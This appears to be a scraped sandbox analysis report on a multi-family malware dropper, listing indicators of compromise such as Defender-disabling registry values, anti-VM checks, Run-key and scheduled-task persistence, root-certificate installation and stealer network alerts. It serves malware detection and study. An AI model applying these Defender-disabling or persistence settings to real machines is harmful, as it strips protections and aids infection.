djvu | be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.execMrn0hy0JuBiO_TvoDlE4yGY.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 37844 316 rundll32.exe
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	37844	316	rundll32.exe

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/15568-352-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Generic Stealer Config Download Request
suricata: ET MALWARE Generic Stealer Config Download Request
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Recordbreaker Stealer CnC Checkin
suricata: ET MALWARE Recordbreaker Stealer CnC Checkin
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata
suricata: ET MALWARE Win32/RecordBreaker CnC Checkin
suricata: ET MALWARE Win32/RecordBreaker CnC Checkin
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

1wK59ewxmA8n1F3L1XAnYyfI.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1wK59ewxmA8n1F3L1XAnYyfI.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1wK59ewxmA8n1F3L1XAnYyfI.exe

ModiLoader Second Stage 39 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4360-221-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-224-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-231-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-232-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-236-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-237-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-239-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-240-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-238-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-243-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-242-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-241-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-235-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-249-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-262-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-264-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-266-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-265-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-263-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-261-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-260-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-259-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-252-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-251-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-250-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-248-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-234-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-233-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-230-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-229-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-228-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-227-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-226-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-225-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-223-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-222-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-220-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-219-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2
behavioral2/memory/4360-218-0x0000000005090000-0x00000000050C5000-memory.dmp	modiloader_stage2

Vidar Stealer 5 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/428-167-0x00000000047A0000-0x00000000047E9000-memory.dmp	family_vidar
behavioral2/memory/428-169-0x0000000000400000-0x0000000002C6C000-memory.dmp	family_vidar
behavioral2/memory/428-272-0x0000000000400000-0x0000000002C6C000-memory.dmp	family_vidar
behavioral2/memory/1128-337-0x00000000022B0000-0x00000000022FB000-memory.dmp	family_vidar
behavioral2/memory/1128-350-0x0000000000400000-0x000000000067D000-memory.dmp	family_vidar

Blocklisted process makes network request 1 IoCs

Processes:

cmd.exe

flow pid process

56 4120 cmd.exe
Downloads MZ/PE file

flow	pid	process
56	4120	cmd.exe

Executes dropped EXE 10 IoCs

Processes:

GbuD4i_efESBuRODxYNQDKS8.exe2uXEeqzhu92tsk2yel57BCLr.exe1AqPQJBbIZ5GNPPjIY1eYvX4.exeSGAXIbr9pYUeG2DexXN9AgtZ.exe1wK59ewxmA8n1F3L1XAnYyfI.exe4zjfSqgdDfO75cEazgMM31G2.exeqosyhVzrDNPFTA7hWJVASQ98.execMrn0hy0JuBiO_TvoDlE4yGY.exedpYfYpV7Y8FistCPU3hIQZVI.exeGETSUD~4.EXE

pid	process
3780	GbuD4i_efESBuRODxYNQDKS8.exe
4824	2uXEeqzhu92tsk2yel57BCLr.exe
4120	1AqPQJBbIZ5GNPPjIY1eYvX4.exe
428	SGAXIbr9pYUeG2DexXN9AgtZ.exe
4360	1wK59ewxmA8n1F3L1XAnYyfI.exe
2484	4zjfSqgdDfO75cEazgMM31G2.exe
2016	qosyhVzrDNPFTA7hWJVASQ98.exe
4264	cMrn0hy0JuBiO_TvoDlE4yGY.exe
4984	dpYfYpV7Y8FistCPU3hIQZVI.exe
208	GETSUD~4.EXE

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\3cjfmU9Ge1H2eeLel63Xu4Z5.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\3cjfmU9Ge1H2eeLel63Xu4Z5.exe	vmprotect
behavioral2/memory/3632-318-0x0000000000400000-0x000000000090B000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

1wK59ewxmA8n1F3L1XAnYyfI.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1wK59ewxmA8n1F3L1XAnYyfI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1wK59ewxmA8n1F3L1XAnYyfI.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

cMrn0hy0JuBiO_TvoDlE4yGY.exebe42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe2uXEeqzhu92tsk2yel57BCLr.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cMrn0hy0JuBiO_TvoDlE4yGY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	2uXEeqzhu92tsk2yel57BCLr.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

35868 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
35868	icacls.exe

Themida packer 15 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\1wK59ewxmA8n1F3L1XAnYyfI.exe	themida
C:\Users\Admin\Pictures\Adobe Films\1wK59ewxmA8n1F3L1XAnYyfI.exe	themida
behavioral2/memory/4360-146-0x00000000001E0000-0x0000000000539000-memory.dmp	themida
behavioral2/memory/4360-147-0x00000000001E0000-0x0000000000539000-memory.dmp	themida
behavioral2/memory/4360-151-0x00000000001E0000-0x0000000000539000-memory.dmp	themida
behavioral2/memory/4360-152-0x00000000001E0000-0x0000000000539000-memory.dmp	themida
C:\Users\Admin\Pictures\Adobe Films\1wK59ewxmA8n1F3L1XAnYyfI.exe	themida
behavioral2/memory/4360-267-0x00000000001E0000-0x0000000000539000-memory.dmp	themida
behavioral2/memory/772-269-0x00000000001E0000-0x0000000000539000-memory.dmp	themida
behavioral2/memory/2060-315-0x00000000001F0000-0x000000000054B000-memory.dmp	themida
C:\Users\Admin\Pictures\Adobe Films\ud6yEaQ6sKfiQJb3OY7zllf7.exe	themida
C:\Users\Admin\Pictures\Adobe Films\ud6yEaQ6sKfiQJb3OY7zllf7.exe	themida
behavioral2/memory/2060-332-0x00000000001F0000-0x000000000054B000-memory.dmp	themida
behavioral2/memory/2060-324-0x00000000001F0000-0x000000000054B000-memory.dmp	themida
behavioral2/memory/2060-322-0x00000000001F0000-0x000000000054B000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

dpYfYpV7Y8FistCPU3hIQZVI.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	dpYfYpV7Y8FistCPU3hIQZVI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	dpYfYpV7Y8FistCPU3hIQZVI.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

1wK59ewxmA8n1F3L1XAnYyfI.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1wK59ewxmA8n1F3L1XAnYyfI.exe

Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

74 ipinfo.io
166 api.2ip.ua
167 api.2ip.ua
13 ipinfo.io
14 ipinfo.io
50 ipinfo.io
77 api.db-ip.com
78 api.db-ip.com
244 ip-api.com
260 api.2ip.ua
261 api.2ip.ua
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

1wK59ewxmA8n1F3L1XAnYyfI.exe

pid process

4360 1wK59ewxmA8n1F3L1XAnYyfI.exe

flow	ioc
74	ipinfo.io
166	api.2ip.ua
167	api.2ip.ua
13	ipinfo.io
14	ipinfo.io
50	ipinfo.io
77	api.db-ip.com
78	api.db-ip.com
244	ip-api.com
260	api.2ip.ua
261	api.2ip.ua

pid	process
4360	1wK59ewxmA8n1F3L1XAnYyfI.exe

Drops file in Program Files directory 2 IoCs

Processes:

2uXEeqzhu92tsk2yel57BCLr.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2uXEeqzhu92tsk2yel57BCLr.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2uXEeqzhu92tsk2yel57BCLr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 26 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2688	2484	WerFault.exe	4zjfSqgdDfO75cEazgMM31G2.exe
4820	4120	WerFault.exe	1AqPQJBbIZ5GNPPjIY1eYvX4.exe
14124	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
26508	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
35528	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
4528	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
19180	1128	WerFault.exe	orp110tpzRWiCv5zfQ5Im6sw.exe
4588	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
2988	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
36904	2060	WerFault.exe	ud6yEaQ6sKfiQJb3OY7zllf7.exe
37204	4380	WerFault.exe	t5HcB7GVPEMlmuXDbChwYp4X.exe
37632	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
37884	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
37016	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
1212	37868	WerFault.exe	rundll32.exe
37084	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
35860	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
3676	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
36952	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
4128	3364	WerFault.exe	cUEBuzu6C11AR30L1vnbB9IO.exe
16840	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
3192	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
37356	28460	WerFault.exe	XRHl3RwuaIHwtns7e9p6HbXT.exe
4284	37820	WerFault.exe	5EA6.exe
19964	3216	WerFault.exe	explorer.exe
1680	1508	WerFault.exe	build2.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

qosyhVzrDNPFTA7hWJVASQ98.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	qosyhVzrDNPFTA7hWJVASQ98.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	qosyhVzrDNPFTA7hWJVASQ98.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	qosyhVzrDNPFTA7hWJVASQ98.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4148 schtasks.exe
2188 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

37156 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

36908 tasklist.exe
37152 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

37656 taskkill.exe
37032 taskkill.exe

pid	process
4148	schtasks.exe
2188	schtasks.exe

pid	process
37156	timeout.exe

pid	process
36908	tasklist.exe
37152	tasklist.exe

pid	process
37656	taskkill.exe
37032	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

37056 PING.EXE
1640 PING.EXE

pid	process
37056	PING.EXE
1640	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exeGbuD4i_efESBuRODxYNQDKS8.exe

pid	process
2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
